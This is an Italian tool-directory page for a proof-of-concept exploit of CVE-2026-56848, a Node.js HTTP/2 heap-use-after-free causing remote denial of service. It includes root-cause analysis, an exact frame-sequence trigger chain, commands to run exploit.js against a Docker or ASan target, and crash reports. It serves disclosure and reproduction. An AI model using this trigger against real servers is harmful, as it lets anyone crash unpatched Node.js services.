Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-56848 — Exploit PoC per CVE-2026-56848, una heap-use-after-free di Node.js HTTP/2 che consente DoS remoto non autenticato. Include trigger raw-socket, istruzioni di build ASan e target basato su Docker. | Kitploit
Strumenti/GitHubGitHub/open-flaw/cve-2026-56848
Analisi delle VulnerabilitàAnalisi Dinamica del Codice (DAST)ExploitSicurezza WebSicurezza di Rete
GitHubopen-flaw/cve-2026-56848

CVE-2026-56848

Exploit PoC per CVE-2026-56848, una heap-use-after-free di Node.js HTTP/2 che consente DoS remoto non autenticato. Include trigger raw-socket, istruzioni di build ASan e target basato su Docker.

Vedi Repository
1 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-56848

Descrizione NVD

Una falla nella gestione HTTP/2 di Node.js consente che nghttp2_session_mem_send() venga chiamata in modo rientrante mentre nghttp2_session_mem_recv() è in esecuzione, causando un heap-use-after-free.

Questa vulnerabilità riguarda Node.js 26.x, 24.x e 22.x.

(Nota: le versioni menzionate nella descrizione si applicano solo al pacchetto nodejs upstream e non al pacchetto nodejs distribuito da Alpine.

Linea di rilascioVulnerabileCorretta
22.x (LTS)≤ 22.23.122.23.2
24.x (LTS)≤ 24.18.024.18.1
26.x≤ 26.5.026.5.1
  • Gravità: Alta (CVSS 7.5, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H — DoS remoto non autenticato tramite corruzione dell'heap)
  • Segnalata da: hahahkim (HackerOne #3833629)
  • Corretta da: Matteo Collina (mcollina)
  • Commit di correzione (v22): daa6d25e3dce — "http2: defer rst stream while in scope" (nodejs-private/node-private#921)
  • Divulgata: rilascio di sicurezza Node.js, 2026-07-29

Causa principale

Http2Stream::SubmitRstStream() in src/node_http2.cc forza una pulizia dei dati in uscita in sospeso prima di accodare il RST_STREAM:```cpp void Http2Stream::SubmitRstStream(const uint32_t code) { CHECK(!this->is_destroyed()); code_ = code;

// (NGHTTP2_CANCEL is deferred — fix for an older double-free) if (session_->is_in_scope() && is_stream_cancel(code)) { session_->AddPendingRstStream(id_); return; }

// If possible, force a purge of any currently pending data here to make // sure it is sent before closing the stream. ... if (session_->SendPendingData() != 0) { // ← RE-ENTRANT mem_send() session_->AddPendingRstStream(id_); return; }

FlushRstStream(); }

root@kitploit:~
`SendPendingData()` chiama `nghttp2_session_mem_send()` ([node_http2.cc:1970](https://github.com/nodejs/node/blob/v22.23.1/src/node_http2.cc#L1970)). La sua unica protezione di rientranza è `is_sending()`, che protegge da *send-during-send* (una scrittura già in corso) — **non da send-during-receive**. Quando `SubmitRstStream()` viene eseguito dall'interno di una catena di callback di `nghttp2_session_mem_recv()` ("in scope"), la purge esegue `mem_send()` in modo rientrante.

Il `mem_send()` rientrante invia i frame la cui elaborazione lato invio distrugge gli stream (`nghttp2_session_close_stream_on_goaway()` → `on_stream_close` → `Http2Stream::Destroy()` → free dell'`Http2Stream` C++). Lo stream liberato è ancora referenziato dall'operazione di ricezione in corso: `SubmitRstStream()` stesso continua a eseguire sul `this` liberato (il suo `FlushRstStream()` finale legge `is_destroyed()`), e il `mem_recv()` esterno continua a scorrere lo stato frame/header per lo stream chiuso → **heap-use-after-free**.

### Catena di trigger (tutto all'interno di una singola chiamata `nghttp2_session_mem_recv()`)

1. L'attaccante invia `GOAWAY(lastStreamID=0, NO_ERROR)` immediatamente seguito da frame `HEADERS` per nuovi stream (3, 5, 7, …) in un singolo segmento TCP.
2. Il `mem_recv()` del server elabora GOAWAY → `session.close()` in JS → `session.closed = true` e un GOAWAY in uscita viene **sottomesso ma non ancora inviato**.
3. nghttp2 rifiuta nuovi stream in arrivo solo dopo che GOAWAY è stato effettivamente *inviato* (`session_allow_incoming_new_stream()` controlla `TERM_ON_SEND | SENT`, non `SUBMITTED`), quindi `HEADERS(3)` viene ancora accettato.
4. `onSessionHeaders()` in JS vede un nuovo stream su una sessione chiusa e lo rifiuta: `handle.rstStream(NGHTTP2_REFUSED_STREAM)` (lib/internal/http2/core.js).
5. `SubmitRstStream(NGHTTP2_REFUSED_STREAM)` in C++ viene eseguito in scope (all'interno di `mem_recv`), `REFUSED_STREAM ≠ CANCEL` → ricade su `SendPendingData()` → **`nghttp2_session_mem_send()` rientrante**.
6. L'invio rientrante invia il GOAWAY in uscita; l'elaborazione lato invio di GOAWAY di nghttp2 chiude gli stream in arrivo con id > 1 (`session_close_stream_on_goaway(..., NGHTTP2_REFUSED_STREAM)`), attivando `on_stream_close` → `Http2Stream::Destroy()` libera l'oggetto C++ dello stream per lo stream 3.
7. L'esecuzione risale in `SubmitRstStream()` sull'oggetto liberato (`FlushRstStream()`), e il `mem_recv()` esterno riprende su stato sessione/stream corrotto → UAF.

Evidenza da `NODE_DEBUG_NATIVE=http2` su un server vulnerabile (una singola lettura di 86 byte):```
receiving 86 bytes, offset 0
complete frame received: type: 7          ← GOAWAY
submitting goaway                          ← GOAWAY submitted, NOT yet sent
beginning headers for stream 3             ← still accepted (only SUBMITTED)
handle headers frame for stream 3          ← JS: session.closed → refuse
sending rst_stream with code 7             ← SubmitRstStream(REFUSED_STREAM), in scope
sending pending data                       ← RE-ENTRANT mem_send()
stream 3 closed with code: 7               ← GOAWAY send closes stream 3
Removing stream: 3 / destroying stream     ← Http2Stream freed mid-recv

Firma comportamentale

L'output a livello di rete è identico nelle build vulnerabili e corrette (entrambe finiscono per inviare solo il GOAWAY in uscita — nelle build vulnerabili l'RST viene inviato contro uno stream già chiuso, nelle build corrette nghttp2 elimina gli RST in coda non appena il GOAWAY esce per primo). La differenza è interna, visibile con NODE_DEBUG_NATIVE=http2:

  • Vulnerabile: sending pending data appare tra sending rst_stream with code 7 e stream 3 closed with code: 7 — la chiamata rientrante mem_send() viene eseguita nel mezzo della ricezione e chiude/distrugge lo stream 3 mentre mem_recv() è ancora in corso (crash sotto ASan).
  • Corretta: nessun sending pending data tra i due — l'RST è solo messo in coda; lo stream 3 si chiude solo durante il normale flush successivo alla ricezione.

PoC```

server.js # minimal http2.createServer() target (no handler needed) exploit.js # raw-socket HTTP/2 client that drives the trigger

root@kitploit:~
### Esecuzione rapida```bash
# Terminal 1: the target (any vulnerable node: 22.23.1 / 24.18.0 / 26.5.0 or older in their lines)
node server.js 8000                       # NODE_BIN=/path/to/node for a specific binary

# Terminal 2: the attack — a crash shows up in terminal 1 (ASan report / segfault)
node exploit.js --port 8000 --iterations 200

./bin/node (la build locale ASan usata di seguito) non è tracciato da git — crealo seguendo le istruzioni in "Building an ASan-instrumented vulnerable Node.js", oppure usa la via Docker.

L'exploit riporta lo stato per connessione; SKIPPED (no handshake) dopo la prima connessione significa che il target è già morto a causa dell'attacco.

Docker

Il Dockerfile crea un target vulnerabile v22.23.1 con ASan all'interno di un container (nessuna toolchain locale necessaria — basta il daemon Docker):```bash docker build -t cve-2026-56848 . docker run --rm -p 8000:8000 --name cve-target cve-2026-56848

from the host, in another terminal:

you could reuse ./bin/node

node exploit.js --port 8000 --iterations 10

inspect the crash (ASan report) and exit code:

docker logs cve-target docker inspect cve-target --format '{{.State.ExitCode}}' # 133 (ASan abort) = crashed

root@kitploit:~
Consiglio: se hai già compilato altrove un binario `node` con strumentazione ASan, salta la
lunga compilazione e impacchettalo direttamente:```bash
docker run --name cve-img -v /path/to/out/Release:/opt/node debian:bookworm-slim \
  bash -c 'apt-get update -qq && apt-get install -y -qq libstdc++6 libatomic1 \
    && cp /opt/node/node /usr/local/bin/node-asan && mkdir -p /app'
docker cp server.js cve-img:/app/server.js
docker commit --change 'WORKDIR /app' --change 'EXPOSE 8000' \
  --change 'ENV HOST=0.0.0.0' --change 'ENV ASAN_OPTIONS=detect_leaks=0:abort_on_error=1' \
  --change 'ENTRYPOINT ["/usr/local/bin/node-asan"]' --change 'CMD ["server.js", "8000"]' \
  cve-img cve-2026-56848:verified

Verificato contro il target containerizzato: la prima connessione di attacco produce ERROR: AddressSanitizer: heap-use-after-free ... ABORTING in docker logs e il container esce (133 su linux/arm64) — stesso UAF dell'esecuzione ASan nativa.

Variante semplice (non-ASan) che utilizza un'immagine ufficiale, per martellare senza una build personalizzata:```bash docker run --rm -p 8000:8000 -e HOST=0.0.0.0 -v "$PWD/server.js":/server.js
node:22.23.1-alpine node /server.js 8000

root@kitploit:~
Nota: se ASan non riesce ad avviarsi all'interno del container con un errore di intervallo di memoria shadow (riscontrato su alcuni kernel ARM64 con `vm.mmap_rnd_bits` elevato), riduci l'entropia sull'host Docker: `sysctl vm.mmap_rnd_bits=28`.

### Creare un Node.js vulnerabile instrumentato con ASan```bash
# Linux (officially supported):
git clone --depth 1 --branch v22.23.1 https://github.com/nodejs/node
cd node && ./configure --debug --enable-asan && make -j$(nproc)

# macOS (unofficial but works with clang):
git clone --depth 1 --branch v22.23.1 https://github.com/nodejs/node
cd node && CC=clang CXX=clang++ \
  CFLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  LDFLAGS="-fsanitize=address" \
  ./configure --debug --ninja && ninja -C out/Debug node

La build ASan riproduce l'heap-use-after-free in modo deterministico (tipicamente sulle prime connessioni). Le build di release normali di solito non vanno in crash perché il chunk liberato non viene riutilizzato immediatamente; facendo molti tentativi si aumentano le probabilità, ma ASan è il modo affidabile per dimostrare la corruzione.

Risultati verificati

TargetResult
v22.23.1 + ASan (vulnerabile)Crasha alla prima connessione d'attacco: heap-use-after-free → SIGABRT, runner exit 0
v22.23.2 (corretto)Sopravvive a tutte le connessioni, runner exit 1

Report ASan (estratto, build v22.23.1 macOS arm64):``` ERROR: AddressSanitizer: heap-use-after-free ... READ of size 1 at 0x60d000003cdc thread T0 #0 session_end_stream_headers_received nghttp2_session.c:3711 #1 session_after_header_block_received nghttp2_session.c:3824 #2 nghttp2_session_mem_recv2 nghttp2_session.c:6506 #3 nghttp2_session_mem_recv nghttp2_session.c:5421 #4 node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959

freed by thread T0 here: ... #5 nghttp2_session_destroy_stream nghttp2_session.c:1369 #6 nghttp2_session_close_stream nghttp2_session.c:1350 #7 session_close_stream_on_goaway nghttp2_session.c:2442 #8 session_after_frame_sent1 nghttp2_session.c:2665 #9 nghttp2_session_mem_send2 nghttp2_session.c:3144 ← re-entrant send #10 node::http2::Http2Session::SendPendingData() node_http2.cc:1970 #11 node::http2::Http2Stream::SubmitRstStream(...) node_http2.cc:2535

root@kitploit:~
L'`mem_recv()` esterno legge `stream->shut_flags` dall'`nghttp2_stream` del flusso 3 — liberato dalla gestione GOAWAY del `mem_send()` rientrante — esattamente la rientranza descritta nell'avviso.```zsh
➜ ./bin/node  server.js 8000
[server] listening on 8000
=================================================================
==46874==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000003cdc at pc 0x00010984c5fc bp 0x00016b3e8c60 sp 0x00016b3e8c58
READ of size 1 at 0x60d000003cdc thread T0
    #0 0x00010984c5f8 in session_end_stream_headers_received nghttp2_session.c:3711
    #1 0x00010983e7d8 in session_after_header_block_received nghttp2_session.c:3824
    #2 0x000109838518 in nghttp2_session_mem_recv2 nghttp2_session.c:6506
    #3 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #4 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959
    #5 0x0001050ad564 in node::http2::Http2Session::OnStreamRead(long, uv_buf_t const&) node_http2.cc:2194
    #6 0x000104dda218 in node::StreamResource::EmitRead(long, uv_buf_t const&) stream_base-inl.h:79
    #7 0x000105544d1c in node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) stream_wrap.cc:292
    #8 0x000105547be4 in node::LibuvStreamWrap::ReadStart()::$_1::operator()(uv_stream_s*, long, uv_buf_t const*) const stream_wrap.cc:212
    #9 0x0001055479bc in node::LibuvStreamWrap::ReadStart()::$_1::__invoke(uv_stream_s*, long, uv_buf_t const*) stream_wrap.cc:208
    #10 0x0001085e025c in uv__read stream.c:1148
    #11 0x0001085d5568 in uv__stream_io stream.c:1208
    #12 0x000108600844 in uv__io_poll kqueue.c:423
    #13 0x000108599e94 in uv_run core.c:460
    #14 0x000104afc710 in node::SpinEventLoopInternal(node::Environment*) embed_helpers.cc:41
    #15 0x000105134040 in node::NodeMainInstance::Run(node::ExitCode*, node::Environment*) node_main_instance.cc:111
    #16 0x000105133564 in node::NodeMainInstance::Run() node_main_instance.cc:100
    #17 0x000104e74864 in node::StartInternal(int, char**) node.cc:1630
    #18 0x000104e73ed8 in node::Start(int, char**) node.cc:1637
    #19 0x00010928e3d4 in main node_main.cc:97
    #20 0x000189482b94  (<unknown module>)

0x60d000003cdc is located 124 bytes inside of 136-byte region [0x60d000003c60,0x60d000003ce8)
freed by thread T0 here:
    #0 0x000117991424 in free+0x7c (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x3d424)
    #1 0x000104bebe3c in char* node::UncheckedRealloc<char>(char*, unsigned long) util-inl.h:261
    #2 0x000105112128 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::ReallocImpl(void*, unsigned long, void*) node_mem-inl.h:53
    #3 0x000105111f80 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::FreeImpl(void*, void*) node_mem-inl.h:83
    #4 0x00010981a450 in nghttp2_mem_free nghttp2_mem.c:61
    #5 0x000109825aa8 in nghttp2_session_destroy_stream nghttp2_session.c:1369
    #6 0x0001098258ac in nghttp2_session_close_stream nghttp2_session.c:1350
    #7 0x00010983002c in session_close_stream_on_goaway nghttp2_session.c:2442
    #8 0x000109828e64 in session_after_frame_sent1 nghttp2_session.c:2665
    #9 0x000109826804 in nghttp2_session_mem_send2 nghttp2_session.c:3144
    #10 0x000109826724 in nghttp2_session_mem_send nghttp2_session.c:3124
    #11 0x00010509e878 in node::http2::Http2Session::SendPendingData() node_http2.cc:1970
    #12 0x0001050a359c in node::http2::Http2Stream::SubmitRstStream(unsigned int) node_http2.cc:2535
    #13 0x0001050b973c in node::http2::Http2Stream::RstStream(v8::FunctionCallbackInfo<v8::Value> const&) node_http2.cc:3044
    #14 0x0001086163d4 in Builtins_CallApiCallbackGeneric+0xb4 (node:arm64+0x103c0e3d4)
    #15 0x00010861432c in Builtins_InterpreterEntryTrampoline+0x10c (node:arm64+0x103c0c32c)
    #16 0x0001086117c8 in Builtins_JSEntryTrampoline+0xa8 (node:arm64+0x103c097c8)
    #17 0x0001086114b0 in Builtins_JSEntry+0x90 (node:arm64+0x103c094b0)
    #18 0x000105ff5358 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) execution.cc:418
    #19 0x000105ff408c in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) execution.cc:504
    #20 0x00010590caac in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) api.cc:5485
    #21 0x000104af5168 in node::InternalMakeCallback(node::Environment*, v8::Local<v8::Object>, v8::Local<v8::Object>, v8::Local<v8::Function>, int, v8::Local<v8::Value>*, node::async_context, v8::Local<v8::Value>) callback.cc:237
    #22 0x000104b69780 in node::AsyncWrap::MakeCallback(v8::Local<v8::Function>, int, v8::Local<v8::Value>*) async_wrap.cc:665
    #23 0x0001050a463c in node::http2::Http2Session::HandleHeadersFrame(nghttp2_frame const*) node_http2.cc:1567
    #24 0x000105092e68 in node::http2::Http2Session::OnFrameReceive(nghttp2_session*, nghttp2_frame const*, void*) node_http2.cc:1107
    #25 0x00010982b5b0 in session_call_on_frame_received nghttp2_session.c:3229
    #26 0x00010983e72c in session_after_header_block_received nghttp2_session.c:3815
    #27 0x000109838518 in nghttp2_session_mem_recv2 nghttp2_session.c:6506
    #28 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #29 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959

previously allocated by thread T0 here:
    #0 0x000117991520 in realloc+0x80 (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x3d520)
    #1 0x000104bebe58 in char* node::UncheckedRealloc<char>(char*, unsigned long) util-inl.h:265
    #2 0x000105112128 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::ReallocImpl(void*, unsigned long, void*) node_mem-inl.h:53
    #3 0x000105111f3c in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::MallocImpl(unsigned long, void*) node_mem-inl.h:77
    #4 0x00010981a3a0 in nghttp2_mem_malloc nghttp2_mem.c:57
    #5 0x000109824728 in nghttp2_session_open_stream nghttp2_session.c:1227
    #6 0x000109829ee8 in nghttp2_session_on_request_headers_received nghttp2_session.c:3910
    #7 0x00010983c454 in session_process_headers_frame nghttp2_session.c:4058
    #8 0x000109833ad4 in nghttp2_session_mem_recv2 nghttp2_session.c:5657
    #9 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #10 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959
    #11 0x0001050ad564 in node::http2::Http2Session::OnStreamRead(long, uv_buf_t const&) node_http2.cc:2194
    #12 0x000104dda218 in node::StreamResource::EmitRead(long, uv_buf_t const&) stream_base-inl.h:79
    #13 0x000105544d1c in node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) stream_wrap.cc:292
    #14 0x000105547be4 in node::LibuvStreamWrap::ReadStart()::$_1::operator()(uv_stream_s*, long, uv_buf_t const*) const stream_wrap.cc:212
    #15 0x0001055479bc in node::LibuvStreamWrap::ReadStart()::$_1::__invoke(uv_stream_s*, long, uv_buf_t const*) stream_wrap.cc:208
    #16 0x0001085e025c in uv__read stream.c:1148
    #17 0x0001085d5568 in uv__stream_io stream.c:1208
    #18 0x000108600844 in uv__io_poll kqueue.c:423
    #19 0x000108599e94 in uv_run core.c:460
    #20 0x000104afc710 in node::SpinEventLoopInternal(node::Environment*) embed_helpers.cc:41
    #21 0x000105134040 in node::NodeMainInstance::Run(node::ExitCode*, node::Environment*) node_main_instance.cc:111
    #22 0x000105133564 in node::NodeMainInstance::Run() node_main_instance.cc:100
    #23 0x000104e74864 in node::StartInternal(int, char**) node.cc:1630
    #24 0x000104e73ed8 in node::Start(int, char**) node.cc:1637
    #25 0x00010928e3d4 in main node_main.cc:97
    #26 0x000189482b94  (<unknown module>)

SUMMARY: AddressSanitizer: heap-use-after-free nghttp2_session.c:3711 in session_end_stream_headers_received
Shadow bytes around the buggy address:
  0x60d000003a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x60d000003a80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x60d000003b00: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x60d000003b80: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x60d000003c00: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
=>0x60d000003c80: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fa fa fa
  0x60d000003d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==46874==ABORTING
[1]    46874 abort      ./bin/node server.js 8000

Riferimenti

  • Rilasci di sicurezza di Node.js — 29 luglio 2026
  • Commit di correzione (v22.23.2): http2: rimanda rst stream mentre è in scope
  • Test di regressione: test-http2-rst-stream-reentrancy.js
  • nodejs-private/node-private#921
  • Segnalazione HackerOne 3833629 (non ancora pubblica)
  • CVE-2026-56848 — Centro minacce IONIX
  • Pagina CVE di Red Hat
Scarica lo strumento